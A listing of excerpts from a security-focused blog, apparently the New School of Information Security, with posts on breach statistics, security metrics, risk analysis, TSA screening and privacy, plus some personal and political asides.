From Krugman (commentary is his): “Without metrics, you’re just another guy with an opinion. — Stephan Leschka, Hewlett Packard When I hear words from almost anyone about how their approach is better than some other approach, I think of this quote. And as Daniel Patrick Moynihan said: Every man is entitled to his own opinion, […]

 

Why Do Outsiders Detect Breaches?

So I haven’t had a chance to really digest the new DBIR yet, but one bit jumped out at me: “86% were discovered by a third party.” I’d like to offer up an explanatory story of why might that be, and muse a little on what it might mean for the deployment of intrusion detection […]

 

Data driven pen tests

So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques. What we could use are data-driven pen test reports. “We […]

 

VERIS Community Data

Seriously. Interesting.  Go check this out: http://securityblog.verizonbusiness.com/2011/04/12/veris-community-project-update/ Take a look, impact information!

 

Why Do You Write The Way You Do?

Hey Kids, Reader Mark Wallace wrote in a comment to the blog yesterday, and I wanted to answer the comment in an actual blog post. So here goes: — Mark, Thanks for reading! There’s a point where publicly writing forces me to answer a few questions that I’m not ready to make a quick decision […]

 

Happy Yuri's Night!

Today, April 12, 2011 is the 50th Anniversary of Yuri Gagarin’s historic first flight. Why not join a celebration? Invite to the Kremlin event via Xeni Jardin.

 

What is Risk (again)?

The thread “What is Risk?” came up on a linkedin Group. Thought you might enjoy my answer: ———————- Risk != uncertainty (unless you’re a Knightian frequentist, and then you don’t believe in measurement anyway), though if you were to account for risk in an equation, the amount of uncertainty would be a factor. risk != […]

 

What's the PIN, Kenneth?

There’s a story in the New York Times, “To Get In, Push Buttons, or Maybe Swipe a Magnet” which makes interesting allusions to the meaning of fair trade in locks, implied warranties and the need for empiricism in security: In court filings, Kaba argued that it had “never advertised or warranted in any way that […]

 
 

Ahem: The New School is more than Data

In “Why The New School Is Important,” Alex writes: Being New School won’t solve your problems. What a New School mindset will do for you is help you begin to understand what your problems actually are. So without arguing with the rest of Alex’s post, I’m forced to beg to differ. The New School is […]

 

Why The New School Is Important

I participated in another security metrics and risk discussion yesterday (yeah, me talk about metrics & risk –  you don’t say).  As part of this discussion someone echoed a sentiment I’ve been hearing more and more of recently.  A casual acceptance of the logic of metrics and data followed quickly by a dismissive, skeptical statement […]

 

NewSchool Zombies, Moneyball, & Metrics

Hey!   Tomorrow at 1pm ET reg now: @joshcorman & I redux our (in)famous ‘Metrics are Bunk!?’ debate from RSAC 2011: http://bit.ly/i6z1BL              

 

Hey! SourceBoston is going to be CRAZY!

Not crazy like Sammy-Hagar-has-clearly-abused-his-brain-and-its-giving-him-bad-information-to-come-out-of-his-mouth crazy, but crazy like, there-are-so-many-good-talks-you-can’t-possibly-not-get-value-out-of-the-conference crazy. For example, I’ll be talking twice. Once with Dan Geer and Greg Shannon about Prediction Markets in InfoSec.  Then I’ll be giving one of THE FIRST EVER (!) debriefings of the 2011 DBIR (which is going to be crazy like both of the above). I’m […]

 

Microsoft Backs Laws Forbidding Windows Use By Foreigners

According to Groklaw, Microsoft is backing laws that forbid the use of Windows outside of the US. Groklaw doesn’t say that directly. Actually, they pose charmingly with the back of the hand to the forehead, bending backwards dramatically and asking, “ Why Is Microsoft Seeking New State Laws That Allow it to Sue Competitors For […]

 

I'd like some of that advertising action

Several weeks back, I was listening to the Technometria podcast on “Personal Data Ecosystems,” and they talked a lot about putting the consumer in the center of various markets. I wrote this post then, and held off posting it in light of the tragic events in Japan. One element of this is the “VRM” or […]

 

Sedgwick, Maine versus the Feds

“Maine Town Declares Food Sovereignty, Nullifies Conflicting Laws.” So reads the headline at the 10th Amendment center blog: The Maine town of Sedgwick took an interesting step that brings a new dynamic to the movement to maintain sovereignty: Town-level nullification. Last Friday, the town passed a proposed ordinance that would empower the local level to […]

 

Back to You, Rob!

Rob is apparently confused about what risk management means. I tried to leave this as a comment, but apparently there are limitations in commenting.  So here go:   Rob, Nowhere did I imply you were a bad pen tester.  I just said that you should have a salient view of failure in complex systems (which […]

 

Actually It *IS* Too Early For Fukushima Hindsight

OR – RISK ANALYSIS POST-INCIDENT, HOW TO DO IT RIGHT Rob Graham called me out on something I retweeted here (seriously, who calls someone out on a retweet?  Who does that?): http://erratasec.blogspot.com/2011/03/fukushima-too-soon-for-hindsight.html And that’s cool, I’m a big boy, I can take it.  And Twitter doesn’t really give you a means to explain why you […]

 

What does Coviello's RSA breach letter mean?

After spending a while crowing about the ChoicePoint breach, I decided that laughing about breaches doesn’t help us as much as analyzing them. In the wake of RSA’s recent breach, we should give them time to figure out what happened, and look forward to them fulfilling their commitment to share their experiences. Right now we […]

 

Questions about a Libyan no-fly zone

With the crisis in Japan, attention to the plight of those trying to remove Colonel Kaddafi from power in Libya has waned, but there are still calls, including ones from the Arab League, to impose a no-fly zone. Such a zone would “even the fight” between the rebels and Kaddafi’s forces. There are strong calls […]

 

Copyrighted Science

In “Shaking Down Science,” Matt Blaze takes issue with academic copyright policies. This is something I’ve been meaning to write about since Elsevier, a “reputable scientific publisher,” was caught publishing a full line of fake journals. Matt concludes: So from now on, I’m adopting my own copyright policies. In a perfect world, I’d simply refuse […]

 

SIRA Meeting! THURSDAY

THURSDAY, THURSDAY, THURSDAY!!!!!!! Hi everyone! SIRA’s March monthly webinar is this Thursday, March 10th from 12-1 PM EST. We are excited to have Mr. Nicholas Percoco, Head of SpiderLabs at Trustwave, talk to us about the 2011 Trustwave Global Security Report. Block off your calendars now! Hello , Alexander Hutton invites you to attend this […]

 

Fear, Information Security, and a TED Talk

In watching this TEDMed talk by Thomas Goetz, I was struck by what a great lesson it holds for information security. You should watch at least the first 7 minutes or so. (The next 9 minutes are interesting, but less instructive for information security.) The key lesson that I’d like you to take from this […]

 

Measurement Priorities

Seth Godin asks an excellent question: Is something important because you measure it, or is it measured because it’s important? I find that we tend to measure what we can, rather than working toward being able to measure what we should, in large part because some variation of this question is not asked. I’m going […]

 

Fixes to Wysopal’s Application Security Debt Metric

In two recent blog posts (here and here), Chris Wysopal (CTO of Veracode) proposed a metric called “Application Security Debt”.  I like the general idea, but I have found some problems in his method.  In this post, I suggest corrections that will be both more credible and more accurate, at least for half of the […]

 
 

Unmeddle Housing More

Last month, I wrote: But after 50 years of meddling in the market, reducing the support for housing is going to be exceptionally complex and chaotic. And the chaos isn’t going to be evenly distributed. It’s going to be a matter of long, complex laws whose outcomes are carefully and secretly influenced. Groups who aren’t […]

 

Best Practices for the Lulz

The New School blog will shortly be publishing a stunning expose of Anonymous, and before we do, we’re looking for security advice we should follow to ensure our cloud-hosted blog platform isn’t pwned out the wazoo. So, where’s the checklist of all best practices we should be following? What’s that you say? There isn’t a […]

 

Is Norton Cybercrime Index just 'Security Metrics Theater'?

Symantec’s new Norton Cybercrime Index looks like it is mostly a marketing tool. They present it as though there is solid science, data, and methods behind it, but an initial analysis shows that this is probably not the case. The only way to have confidence in this is if Symantec opens up about their algorthms and data.

 

Police Officers should be able to speak out

I got this in email and wanted to amplify it: Law Enforcement Against Prohibition prides itself on the willingness of our members to stand up and take action against drug prohibition. Last fall, LEAP member Joe Miller did exactly that. A California police officer for eight years before taking a position as a deputy probation […]

 

SIRA Meeting Today at Noon EST! >> RICH MOGULL

HEY Y’ALL @securosis’ own @rmogull for today’s “al desco” SIRA meeting.  Details, details: SIRA’s February monthly online meeting is TODAY; February 10th from 12-1 PM EST. We are excited to have Mr. Rich Mogull from Securosis talk to us with a behind-the-scene look at Securosis’ “2010 Data Security Survey”. Block off your calendars now! The […]

 

Would a CISO benefit from an MBA education?

If a CISO is expected to be an executive officer (esp. for a large, complex technology- or information-centered organization), then he/she will need the MBA-level knowledge and skill. MBA is one path to getting those skills, at least if you are thoughtful and selective about the school you choose. Other paths are available, so it’s not just about an MBA credential.

Otherwise, if a CISO is essentially the Most Senior Information Security Manager, then MBA education wouldn’t be of much value.

 

Elevation of Privilege (Web Edition) Question

Someone wrote to me to ask: A few cards are not straightforward to apply to a webapp situation (some seem assume a proprietary client) – do you recommend discarding them or perhaps you thought of a way to rephrase them somehow? For example: “An attacker can make a client unavailable or unusable but the problem […]

 

What should a printer print?

Over at their blog, i.Materialise (a 3D printing shop) brags about not taking an order. The post is “ATTENTION: ATM skimming device.” It opens: There is no doubt that 3D printing is a versatile tool for materializing your 3D ideas. Unfortunately, those who wish to break the law can also try to use our technology. […]

 

Infosec's Flu

In “Close Look at a Flu Outbreak Upends Some Common Wisdom,” Nicholas Bakalar writes: If you or your child came down with influenza during the H1N1, or swine flu, outbreak in 2009, it may not have happened the way you thought it did. A new study of a 2009 epidemic at a school in Pennsylvania […]

 
 

Egypt and Information Security

Yesterday, I said on Twitter that “If you work in information security, what’s happening in Egypt is a trove of metaphors and lessons for your work. Please pay attention.” My goal is not to say that what’s happening in Egypt is about information security, but rather to say that we can be both professional and […]

 

Self Promotion: A Little Interview about Alex @ RSA

Self Promotion time, sorry for the spam, but I think the stuff I’ll be participating in at RSA is pretty NewSchool.  Here’s an interview that talks about both of the things I’ll be doing and you can see if they’ll be interesting: http://itacidentityblog.com/rsa-podcast-alex-hutton-principal-in-research-and-risk-intelligence-verizon-business

 

Mubarak and TSA agree: No advantage to them leaving

In “TSA shuts door on private airport screening program,” CNN reports that “TSA chief John Pistole said Friday he has decided not to expand the program beyond the current 16 airports, saying he does not see any advantage to it.” The advantage, of course, is that it generates pressure on his agency to do better. […]

 

Another critique of Ponemon's method for estimating 'cost of data breach'

I have fundamental objections to Ponemon’s methods used to estimate ‘indirect costs’ due to lost customers (‘abnormal churn’) and the cost of replacing them (‘customer acquisition costs’). These include sloppy use of terminology, mixing accounting and economic costs, and omitting the most serious cost categories.

 

A critique of Ponemon Institute methodology for "churn"

Both Dissent and George Hulme took issue with my post Thursday, and pointed to the Ponemon U.S. Cost of a Data Breach Study, which says: Average abnormal churn rates across all incidents in the study were slightly higher than last year (from 3.6 percent in 2008 to 3.7 percent in 2009), which was measured by […]

 

Requests for a proof of non-existence

So before I respond to some of the questions that my “A day of reckoning” post raises, let me say a few things. First, proving that a breach has no impact on brand is impossible, in the same way that proving the non-existence of god or black swans is impossible. It will always be possible […]

 

Gunnar on Heartland

Analysis of Heartland’s business as a going concern by @oneraindrop. Especially interesting after comments on the CMO video.

 

A Day of Reckoning is Coming

Over at The CMO Site, Terry Sweeney explains that “Hacker Attacks Won’t Hurt Your Company Brand.” Take a couple of minutes to watch this. Let me call your attention to this as a turning point for a trend. Those of us in the New School have been saying this for several years, but the idea […]

 

A few thoughts on chaos in Tunisia

The people of Tunisia have long been living under an oppressive dictator who’s an ally of the US in our ‘war on terror.’ Yesterday, after substantial loss of life, street protests drove the dictator to abdicate. There’s lots of silly technologists claiming it was twitter. A slightly more nuanced comment is in “Sans URL” Others, […]

 

I have a dream

It’s MLK Day. Here’s a pdf of the speech. Or watch it online:

 

Gunnar's Flat Tax: An Alternative to Prescriptive Compliance?

Hey everybody! I was just reading Gunnar Peterson’s fun little back of the napkin security spending exercise, in which he references his post on a security budget “flat tax” (Three Steps To A Rational Security Budget).  This got me to thinking a bit  – What if, instead of in the world of compliance where we […]

 

Dashboards are Dumb

The visual metaphor of a dashboard is a dumb idea for management-oriented information security metrics. It doesn’t fit the use cases and therefore doesn’t support effective user action based on the information. Dashboards work when the user has proportional controllers or switches that correspond to each of the ‘meters’ and the user can observe the effect of using those controllers and switches in real time by observing the ‘meters’. Dashboards don’t work when there is a loose or ambiguous connection between the information conveyed in the ‘meters’ and the actions that users might take. Other visual metaphors should work better.

 

Unmeddling Housing

For a great many years, US taxpayers have been able to deduct interest paid on a home mortgage from their taxes. That made owning property cost roughly 20% less than it otherwise would have (estimating a 25% tax rate on interest on 80% of a property). So everyone could afford 20% “more” house, which meant […]

 

Referencing Insiders is a Best Practice

You might argue that insiders are dangerous. They’re dangerous because they’re authorized to do things, and so monitoring throws up a great many false positives, and raises privacy concerns. (As if anyone cared about those.) And everyone in information security loves to point to insiders as the ultimate threat. I’m tempted to claim this as […]

 

TSA News Roundup

Event: The Carnegie Institute for Science will be hosting “The Stripping of Freedom: A Careful Scan of TSA Security Procedures” Outrage: “SFO pilot exposes airport security flaws.” Apparently, pilots allowed to carry guns give up their free speech rights “causes the loss of public confidence in TSA…” (does anyone have a copy of the letter?) […]

 

CRISC – The Bottom Line (oh yeah, Happy New Year!)

No doubt my “Why I Don’t Like CRISC” blog post has created a ton of traffic and comments.  Unfortunately, I’m not a very good writer because the majority of readers miss the point.  Let me try again more succinctly: Just because you can codify a standard or practice doesn’t mean that this practice is sane. […]

 

So cute!

There’s just something about skinny girls in pouffy skirts…and stormtrooper helmets. More at http://redandjonny.tumblr.com/

 

Bureaucracy in inaction

Back in September, a group of Czech artists called EPOS 257 camouflaged themselves as city-workers, went to the Palackeho square in Prague and installed a fence. The fence was left on the square with no apparent intent or explanation. At first, the city council didn’t know about it, and when there were told, they didn’t […]

 

Emergent Chaos has TSA "trolls," too

Over at We Won’t Fly, George Donnelly writes: I was about to delete an offensive comment on this blog – one of the very few we get – and thought, hmm, I wonder where this guy is posting from? Because, really, it is quite unusual for us to get nasty comments. Lo and behold, the […]

 

The Only Trust Models You'll Ever Need

Lately there has been quite a bit of noise about the concept of “trust” in information security.  This has always confused me, because I tend towards @bobblakley when he says: “trust is for suckers.” But security is keen on having trendy new memes, things to sell you, and I thought that I might as well […]

 

TSA News roundup

Act: Get this 2-page Passenger’s Rights Sheet: http://saizai.com/tsa_rights.pdf Outrage: “Gaping Holes in Airline Security: Loaded Gun Slips Past TSA Screeners” (Matthew Mosk, Angela Hill and Timothy Fleming, ABC News) “TSA + Police + JetBlue Conspire Against Peaceful Individual at JFK” (George Donnelly, WeWontFly.org) “TSA Lies Again Over Capture, Storage Of Body Scanner Images” (Steve Watson, […]

 

The Emergent Chaos of Facebook relationships

This is a fascinating visualization of 10MM Facebook Friends™ as described in Visualizing Friendships by Paul Butler. A couple of things jump out at me in this emergent look at geography. The first is that Canada is a figment of our imaginations. Sorry to my Canadian friends (at least the anglophones!) The second is that […]

 

Managing WordPress: How to stay informed?

We at the New School blog use WordPress with some plugins. Recently, Alex brought up the question of how we manage to stay up to date. It doesn’t seem that WordPress has a security announcements list, nor do any of our plugins. So I asked Twitter “What’s the best way to track security updates for […]

 

Armoring the Bombers that Came Back

Paul Kedrosky writes: Most of us have heard the story of armoring British bombers, as it’s too good not to share, not to mention being straight from the David Brent school of management motivation. Here is the Wikipedia version: Bomber Command’s Operational Research Section (BC-ORS), analysed a report of a survey carried out by RAF […]

 

Nate Silver in the NYT: A Bayesian Look at Assange

From The Fine Article: Under these circumstances, then, it becomes more likely that the charges are indeed weak (or false) ones made to seem as though they are strong. Conversely, if there were no political motivation, then the merits of the charges would be more closely related to authorities’ zealousness in pursing them, and we […]

 

Can't measure love

But you can still evaluate the quality of the effort Likewise, there’s a lot that you can’t measure about security and risk, but you can still infer something from how the effort is pursued.

 

TSA News roundup

Intrusiveness and outrage: “Homeland Security Is Also Monitoring Your Tweets” “‘Baywatch’ Beauty Feels Overexposed After TSA Scan” (David Moye, AOLnews) “the agent responded, ‘Because you caught my eye, and they’ — pointing to the other passengers — ‘didn’t.’” “POLICE STATE – TSA, Homeland Security & Tampa Police Set Up Nazi Checkpoints At Bus Stations ” […]

 

"Proof" that E-Passports Lead to ID Theft

A couple of things caught Stuart Schechter’s eye about the spam to which this image was attached, but what jumped out at me was the name on the criminal’s passport: Frank Moss, former deputy assistant secretary of state for passport services, now of Identity Matters, LLC. And poor Frank was working so hard to claim […]

 

Lazy Sunday, Lazy Linking

Hey, remember when blogging was new and people would sometimes post links instead of making “the $variable Daily” out of tweets?  Well even though I’m newschool with the security doesn’t mean I can’t kick it oldschool every so often.  So here are some links I thought you might enjoy, probably worth discussion and review even […]

 

The TSA’s Approach to Threat Modeling

“I understand people’s frustrations, and what I’ve said to the TSA is that you have to constantly refine and measure whether what we’re doing is the only way to assure the American people’s safety. And you also have to think through are there other ways of doing it that are less intrusive,” Obama said. “But […]

 

The 1st Software And Usable Security Aligned for Good Engineering (SAUSAGE) Workshop

National Institute of Standards and Technology Gaithersburg, MD USA April 5-6, 2011 Call for Participation The field of usable security has gained significant traction in recent years, evidenced by the annual presentation of usability papers at the top security conferences, and security papers at the top human-computer interaction (HCI) conferences. Evidence is growing that significant […]

 

The 1st Software And Usable Security Aligned for Good Engineering (SAUSAGE) Workshop

National Institute of Standards and Technology Gaithersburg, MD USA April 5-6, 2011 Call for Participation The field of usable security has gained significant traction in recent years, evidenced by the annual presentation of usability papers at the top security conferences, and security papers at the top human-computer interaction (HCI) conferences. Evidence is growing that significant […]

 

District 9

I really enjoyed District 9. Thought I understood some of it. But that was before I read “becoming the alien: apartheid, racism and district 9” by Andries du Toit. Now I need to watch the movie again.

 

Estimating spammer's technical capabilities and pathways of innovation

I’d like some feedback on my data analysis, below, from anyone who is an expert on spam or anti-spam technologies. I’ve analyzed data from John Graham-Cumming’s “Spammers’ Compendium” to estimate the technical capabilities of spammers and the evolution path of innovations.

 

Repeal Day Rant

Rachel Tayse over at Hounds In The Kitchen, has an awesome Repeal Day Rant on why repeal day isn’t as good as it sounds. Yet again I feel a lot less free.

 
 

Risk & Metrics Interview over Twitter Today at 3pm EST

HEY! – At 3pm today Alex (@alexhutton) will be doing an interview over the twitters with Dark Reading’s (@DarkReading) Kelly Jackson Higgins  (@kjhiggins). Follow along with the hashtag #verizonDR! We’ll be talking risk, metrics, data, – you know, the new school-y stuff.

 

"Towards Better Usability, Security and Privacy of Information Technology"

“Towards Better Usability, Security and Privacy of Information Technology” is a great survey of the state of usable security and privacy: Usability has emerged as a significant issue in ensuring the security and privacy of computer systems. More-usable security can help avoid the inadvertent (or even deliberate) undermining of security by users. Indeed, without sufficient […]

 

Grope-a-thon: Today's TSA roundup

Outrage “Adam Savage: TSA saw my junk, missed 12″ razor blades” (Ben Kuchera, Ars Technica with video) “DHS & TSA: Making a list, checking it twice” (Doug Hadmann, Canada Free Press) claims that DHS has an internal memo calling those 59% of Americans who oppose pat downs “domestic extremists.” No copies of the memo have […]

 

What is Information Security: New School Primer

Recently, I’ve heard some bits and pieces about how Information Security (InfoSec) can be “threat-centric” or “vulnerability-centric”.  This stuck me funny for a number of reasons, mainly  it showed a basic bias towards what InfoSec *is*.  And to me, InfoSec is too complex to be described as “threat-centric” or “vulnerability-centric” and yet still simple enough […]

 

Israeli Draft, Facebook and Privacy

A senior officer said they had found examples of young women who had declared themselves exempt posting photographs of themselves on Facebook in immodest clothing, or eating in non-kosher restaurants. Others were caught by responding to party invitations on Friday nights – the Jewish Sabbath. (“Israeli army uses Facebook to expose draft dodgers,” Wyre Davies, […]

 
 

Happy Birthday, Stan

“baseball’s rich in wonderful statistics, but it’s hard to find one more beautiful than Stan Musial’s hitting record.” – George Will “When you first hear about this guy, you say, ‘it can’t be true.’ When you first meet him you say, ‘It must be an act.’ But as you watch him and watch him and […]

 

News Round Up: New blog edition

I’ll be contributing to a new group blog, “I will opt out“. I think that concentrating and combining resources will help the people who care find all the news they want. My first post is at “More news from around the web”

 

Animals and Engineers

It’s been hard to miss the story on cat tongues (“For Cats, a Big Gulp With a Touch of the Tongue:)” Writing in the Thursday issue of Science, the four engineers report that the cat’s lapping method depends on its instinctive ability to calculate the balance between opposing gravitational and inertial forces. …After calculating things […]

 

Games and The New School

On my work (“Microsoft Security Development Lifecycle”) blog, I’ve posted “Make Your Own Game! (My BlueHat lightning talk).”

 

Grope up: Enough is Enough edition

Analysis: “‘Strip-or-Grope’ vs. Risk Management” Jim Harper, Cato@Liberty blog. Really solid thinking, although I usually don’t like asset-centric approaches, I think that for the physical world they make more sense than they do in software threat modeling. TSA more likely to kill you than a terrorist. thread at Flyertalk (thanks Doug!) “Has Airport Security Gone […]

 

Daily Grope Up

Outrage: Transcript: Senate hearing on TSA, full-body scanners (yesterday, not one Senator cared.) Today’s hearing: http://www.c-span.org/Watch/C-SPAN3.aspx TSA Success Story (You can win in line.) If someone had done that to me at a nightclub I’d call the cops. Violated Traveling with scars Search this one for “pump” to learn about a diabetic’s experience. What would […]

 

You are being tracked

In this instance, it’s for science, helping a friend do some work on analyzing web traffic. If you don’t like it, please install software that blocks these 1 pixel images from tracking you. Edit: removed the web bug

 

Visualization for Gunnar's "Heartland Revisited"

You may have heard me say in the past that one of the more interesting aspects of security breaches, for me at least, is the concept of reputation damage.  Maybe that’s because I heard so many sales tactics tied to defacement in the 90’s, maybe because it’s so hard to actually quantify brand equity and […]

 

It's time to call your Senator!

There’s no news roundup today, the stories are flying, unlike people, who are sick and tired of the indignities, the nudeatrons and the groping. If you want to see them, you can follow me on twitter or National Opt Out day Tomorrow, there’s a Transportation Security Administration Oversight Hearing whose only witness is TSA Administrator […]

 

Daily Grope-Up: The Groping Will Continue Until You Drive Edition

“‘Naked’ scanners at U.S. airports may be dangerous: scientists” (National Post) The head of the X-ray lab at Johns Hopkins says “statistically, someone is going to get skin cancer from these X-rays.” “DHS chief tells pilot, tourism reps scans and patdowns will continue ” (Infowars.com) includes link to a CNN story “Growing backlash against TSA […]

 

VERIS Community Incident Reporting

PEOPLE OF EARTH – The VERIS Community Application is out: Announcement here:  http://bit.ly/cDAUhy  Website here:  http://bit.ly/9dZwEJ  From Wade’s announcement: If the VERIS framework describes what information should be shared, the VERIS application provides how to actually share it. Anyone wishing to classify and report an incident can do so responsibly and anonymously using the application. In taking […]

 

Today's TSA news grope-up

“Terror chief tries to board plane with banned liquids” (Mirror, UK) Obviously, the UK needs to get with the TSA program and exempt Ministers from search. Flight attendants union upset over new pat-down procedures “Airport security reaches new levels of absurdity” (Salon’s Ask the Pilot blog) “Know Your Options at the Airport” (ACLU of Massachusetts) […]

 

Facebook and "your" photos

Facebook Changes Photo Memories to No Longer Show Your Ex-Boyfriends or Ex-Girlfriends: In response to numerous complaints, Facebook has changed its Photo Memories sidebar module to no longer display friends who a user was formally listed as in a relationship with. [Sic] But it’s not just about selective remembering because “Your Memories Will Be Rewritten.” […]

 

Flaw Of Averages – Society of Information Risk Analysts Meeting

Another friendly reminder: Alexander Hutton invites you to attend this online meeting. Topic: RISK ANALYST MEETING Date: Thursday, November 11, 2010 Time: 12:00 pm, Eastern Standard Time (New York, GMT-05:00) Meeting Number: 749 697 377 Meeting Password: riskisswell ——————————————————- To join the online meeting (Now from iPhones and other Smartphones too!) ——————————————————- 1. Go to […]

 

Ambrose Bierce Punks Richard Feynman

Via Boing Boing, where Maggie Koerth-Baker gave a delightful pointer to this film of Feynman explaining for seven-and-a-half minutes why he can’t really explain why magnets repel each other. Or attract, either. And trumping him in time and space, Bierce gave us this in 1906: MAGNET, n. Something acted upon by magnetism. MAGNETISM, n. Something […]

 

TSA Body Scanning is COMPLETELY SAFE… unless

Body scanners that the TSA is basically encouraging use of by threatening to otherwise grope, fondle, or molest you or your children are basically perfectly safe.  Well, unless you happen to be any one of the following: a woman at risk to breast cancer a pregnant woman an immunocompromised individual (HIV and cancer patients) a […]

 

SIRA Meeting Thursday – Flaw Of Averages

Hey everyone.  The Society of Information Risk Analysts (SIRA) would like to invite you to our November meeting this Thursday at 12 noon EST. Here’s a link to a meeting invite: http://bit.ly/d7IHn7 This month, we’ll have Sam Savage, author of the excellent book, The Flaw Of Averages join us.  He’ll be talking about the book […]

 

UC San Francisco Faculty on Nudatrons

A number of faculty at UCSF have a letter to John Holdren, the President’s advisor on science and technology. There’s a related story on NPR.org, but I’d missed the letter. It appears the concerns of 3 members of the National Academy of Sciences have been completely ignored.

 
 

Note on Design of Monitoring Systems

Dissent reports “State Department official admits looking at passport files for more than 500 celebrities.” A passport specialist curious about celebrities has admitted she looked into the confidential files of more than 500 famous Americans without authorization. This got me thinking: how does someone peep at 500 files before anyone notices? What’s wrong with the […]

 

Be celebratory, be very celebratory

A reminder for those of you who haven’t read or watched “V for Vendetta” one time too many, it’s Guy Fawkes Day today: The plan was to blow up the House of Lords during the State Opening of Parliament on 5 November 1605… …Fawkes, who had 10 years of military experience fighting in the Spanish Netherlands in […]

 

Cloudiots on Parade

UPDATE: Should have known Chris Hoff would have been all over this already. From the Twitter Conversation I missed last night: Chris, I award you an honorary NewSchool diploma for that one. ——————————————————————————- From:  Amazon Says Cloud Beats Data Center Security where Steve Riley says, “in no uncertain terms: it’s more secure there than in […]

 

TSA Body Scanners News: Why show ID edition

First, a quick news roundup: EPIC is suing DHS for improper rulemaking, violations of the fouth ammendment, the privacy act, the religious freedom restoration act, and the video voyerism prevention act. The ACLU has a news roundup and a form to report on TSA behavior. The Airline Pilots Association advises pilots to show resistance. So […]

 

Turning off the lights: Chaos Emerges.

See what happened when Portishead, England turned off their traffic lights in September 2009 in this video. And don’t miss “Portishead traffic lights set to stay out after trial” in the Bristol Evening Post.

 
 

TSA: Let us Take Nekkid Pics of You Or You Get "Bad Touch"

Apparently, the TSA is now protecting us so well that they make women cry by touching them inappropriately. According to (CNN Employee Rosemary) Fitzpatrick, a female screener ran her hands around her breasts, over her stomach, buttocks and her inner thighs, and briefly touched her crotch. “I felt helpless, I felt violated, and I felt […]

 

"My little piece of privacy"

Very entertaining video: I love it because curtains are privacy people will pay for, but even more, because, ironically for a privacy-enhancing technology, it generates more attention than not using it.

 

It's not TSA's fault

October 18th’s bad news for the TSA includes a pilot declining the choice between aggressive frisking and a nudatron. He blogs about it in “Well, today was the day:” On the other side I was stopped by another agent and informed that because I had “opted out” of AIT screening, I would have to go […]

 

Collective Smarts: Diversity Emerges

Researchers in the United States have found that putting individual geniuses together into a team doesn’t add up to one intelligent whole. Instead, they found, group intelligence is linked to social skills, taking turns, and the proportion of women in the group. […] “We didn’t expect that the proportion of women would be a significant […]

 

A Letter from Sid CRISC – ious

In the comments to “Why I Don’t Like CRISC” where I challenge ISACA to show us in valid scale and in publicly available models, the risk reduction of COBIT adoption, reader Sid starts to get it, but then kinda devolves into a defense of COBIT or something.  But it’s a great comment, and I wanted […]

 

Seriously? Are We Still Doing this Crap? (RANT MODE = 1)

These days I’m giving a DBIR presentation that highlights the fact that SQLi is 10 years old, and yet is still one of the favorite vectors for data breaches. And while CISO’s love it when I bring this fact up in front of their dev. teams, in all deference to software developers and any ignorance […]

 

Re-architecting the internet?

Information Security.com reports that: [Richard Clarke] controversially declared “that spending more money on technology like anti-virus and IPS is not going to stop us losing cyber-command. Instead, we need to re-architect our networks to create a fortress. Let’s spend money on research to create a whole new architecture, which will cost just a fraction of […]

 

Another personal data invariant that varies

Just about anything a database might store about a person can change. People’s birthdays change (often because they’re incorrectly reported or recorded). People’s gender can change. One thing I thought didn’t change was blood type, but David Molnar pointed out to me that I’m wrong: Donors for allogeneic stem-cell transplantation are selected based on their […]

 

Money is information coined

In the general case, you are not anonymous on the interweb, but economically-anonymous, which I propose to label “enonymous”, and that’s not the same thing at all. If you threaten to kill the President, you will be tracked down, and the state will spend the money it takes on it. But if you call Lily […]

 

Call for Questions: 451 & Verizon DBIR Webinar

Hey everyone. I wanted to mention that Josh Corman of the 451 Group has graciously decided to make a webinar with me on the Data Breach Investigations Report , and has even made the webinar open to the public. So as such, Josh is collecting questions ahead of time.  If you want to submit some […]

 

Java Security & Criminals

Brian Krebs has an interesting article on “Java: A Gift to Exploit Pack Makers.” What makes it interesting is that since information security professionals share data so well, Brian was able to go to the top IDS makers and get practical advice on what really works to secure a system. Sorry, dreaming there for a […]

 

Society Of Information Risk Analysts (SIRA) Meeting Thursday!

HEY! SIRA Meeting on Thursday – click here for a calendar invite/reminder thingy/.ics file -> http://bit.ly/b5RKl9 In long format: Topic: SIRA RISK OCT – SANS! Date: Thursday, October 14, 2010 Time: 10:30 am, Eastern Daylight Time (New York, GMT-04:00) Meeting Number: 745 433 825 Meeting Password: sira ——————————————————- To join the online meeting (Now from […]

 

Lessons from HHS Breach Data

PHIPrivacy asks “do the HHS breach reports offer any surprises?” It’s now been a full year since the new breach reporting requirements went into effect for HIPAA-covered entities. Although I’ve regularly updated this blog with new incidents revealed on HHS’s web site, it might be useful to look at some statistics for the first year’s […]

 
 
 

Free Hossein Derakhshan

Apparently, the Iranian Government has sentenced Hossein “Hoder” Derakhshan to 19.5 years in jail for “collaborating with enemy states, creating propaganda against the Islamic regime, insulting religious sanctity, and creating propaganda for anti-revolutionary groups.” If you think putting bloggers or journalists in jail is wrong, please, please take a moment to sign the petition to […]

 

Wrong bra, no bra: Jail bars lawyer

Via the Miami Herald: An underwire bra stopped a Miami attorney from seeing her client held at the Miami Federal Detention Center, setting off controversy over the inmate facility’s dress code. The issue here isn’t so much the dress code (though it is problematic) but inconsistent enforcement of previously agreed upon rules. It’s hard to […]

 

Saturn's Moon Enceladus

NASA claims that: At least four distinct plumes of water ice spew out from the south polar region of Saturn’s moon Enceladus in this dramatically illuminated image. Light reflected off Saturn is illuminating the surface of the moon while the sun, almost directly behind Enceladus, is backlighting the plumes. See Bursting at the Seams to […]

 

Fines or Reporting?

Over at the Office of Inadequate Security, Dissent does excellent work digging into several perspectives on Discover Card breaches: Discover’s reports, and the (apparent) silence of breached entities. I’m concerned that for many of the breaches they report, we have never seen breach reports filed by the entities themselves nor media reports on the incidents. […]

 
 

ID theft, its Aftermath and Debix AfterCare

In the past, I’ve been opposed to calling impersonation frauds “identity theft.” I’ve wondered why the term impersonation isn’t good enough. As anyone who’s read the ID Theft Resource Center’s ‘ID Theft Aftermath’ reports (2009 report) knows that a lot of the problem with longterm impersonation problems is the psychological impact of disassociation from your […]

 

Airplane Crashes Fall Because Experts Pontificate

The New York Times has a story, “Fatal Crashes of Airplanes Decline 65% Over 10 Years:” …part of the explanation certainly lies in the payoff from sustained efforts by American and many foreign airlines to identify and eliminate small problems that are common precursors to accidents. If only we did the same for security. This […]

 

Book review: "The Human Contribution"

